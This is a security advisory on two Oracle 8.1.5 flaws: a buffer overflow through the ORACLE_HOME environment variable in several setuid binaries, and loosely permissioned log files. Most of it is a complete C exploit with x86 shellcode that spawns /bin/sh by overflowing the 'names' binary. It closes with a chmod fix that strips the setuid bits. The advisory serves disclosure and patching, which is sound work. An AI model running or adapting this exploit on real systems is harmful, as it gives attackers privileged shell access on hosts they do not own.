COMMAND

    Oracle

SYSTEMS AFFECTED

    Oracle 8.1.5

PROBLEM

    Following is based on a Hackerslab bug_paper.  There are two
    security vulnerability in Oracle.

    1. It is possible to create a buffer overflow vulnerability  using
       "ORACLE_HOME",  one  of  the  environmental  value  of  Oracle.
       Oracle applications that are vulnerable to buffer overflow  are
       as follow:

        - names
        - namesctl
        - onrsd
        - osslogin
        - tnslsnr
        - tnsping
        - trcasst
        - trcroute

       Thease  applications  allow  an  attacker  to  excute  a buffer
       overflow exploit.

    2. When a user excutes  one of Oracle applications such  as names,
       oracle or tnslsnr, following log files are created.

       names
       ======

        -rw-rw-r--   1 oracle   dba             0 Oct 20 01:45 ckpcch.ora
        -rw-rw-r--   1 oracle   dba           428 Oct 20 01:45 ckpreg.ora
        -rw-rw-r--   1 oracle   dba           950 Oct 20 01:45 names.log

       oracle
       ======

        -rw-rw----   1 oracle   dba           616 Oct 20 05:14 ora_[running pid].trc

       tnslsnr
       =======

        -rw-rw-r--   1 oracle   dba       2182176 Oct 20  2000 listener.log

    The code:

    /*
    
	    Oracle 8.1.5 exploit
				    -by loveyou
    
	    offset value : -500 ~ +500
    
    */
    #include <stdio.h>
    #include <stdlib.h>
    
    #define BUFFER          	800
    #define NOP             	0x90
    #define PATH               "/hackerslab/loveyou/oracle/8.1.5/bin/names"
    
    char shellcode[] =
    /* - K2 - */
    /* main: */
    "\xeb\x1d"                                        /* jmp callz      	         	*/
    /* start: */
    "\x5e"                                                 /* popl %esi               		*/
    "\x29\xc0"                                         /* subl %eax, %eax         	*/
    "\x88\x46\x07"           	            /* movb %al, 0x07(%esi)    	*/
    "\x89\x46\x0c"                                /* movl %eax, 0x0c(%esi)   	*/
    "\x89\x76\x08"                                /* movl %esi, 0x08(%esi)   	*/
    "\xb0\x0b"                                        /* movb $0x0b, %al         	*/
    "\x87\xf3"                                          /* xchgl %esi, %ebx        	*/
    "\x8d\x4b\x08"                                /* leal 0x08(%ebx), %ecx   	*/
    "\x8d\x53\x0c"                                /* leal 0x0c(%ebx), %edx   	*/
    "\xcd\x80"                                        /* int $0x80               		*/
    "\x29\xc0"                                        /* subl %eax, %eax         	*/
    "\x40"                                                 /* incl %eax               		*/
    "\xcd\x80"                                        /* int $0x80               		*/
    /* callz: */
    "\xe8\xde\xff\xff\xff"                    /* call start              		*/
    "/bin/sh";
    
    
    unsigned long getesp(void)
    {
            __asm__("movl %esp,%eax");
    }
    
    int main(int argc, char *argv[])
    {
            char *buff, *ptr,binary[120];
            long *addr_ptr, addr;
            int bsize=BUFFER;
            int i,offset;
    
            offset = 0 ;
    
            if ( argc > 1 ) offset = atoi(argv[1]);
    
            buff = malloc(bsize);
            addr = getesp() - 5933 - offset;
            ptr = buff;
            addr_ptr = (long *) ptr;
    
            for (i = 0; i < bsize; i+=4)
                    *(addr_ptr++) = addr;
    
            memset(buff,bsize/2,NOP);
    
            ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
            for (i = 0; i < strlen(shellcode); i++)
                    *(ptr++) = shellcode[i];
    
            buff[bsize - 1] = '\0';
    
            setenv("ORACLE_HOME",buff,1);
    
            printf("[ offset:%d buffer=%d ret:0x%x ]\n",
                    offset,strlen(buff),addr);
            system(PATH);
    
    }

SOLUTION

    Contact your vendor for a patch or close setuid permission.

        # su - oracle
        $ cd /oracle_8.1.5_install_directory/bin
        $ chmod a-s names  namesctl  onrsd  osslogin  tnslsnr  tnsping  trcasst  trcroute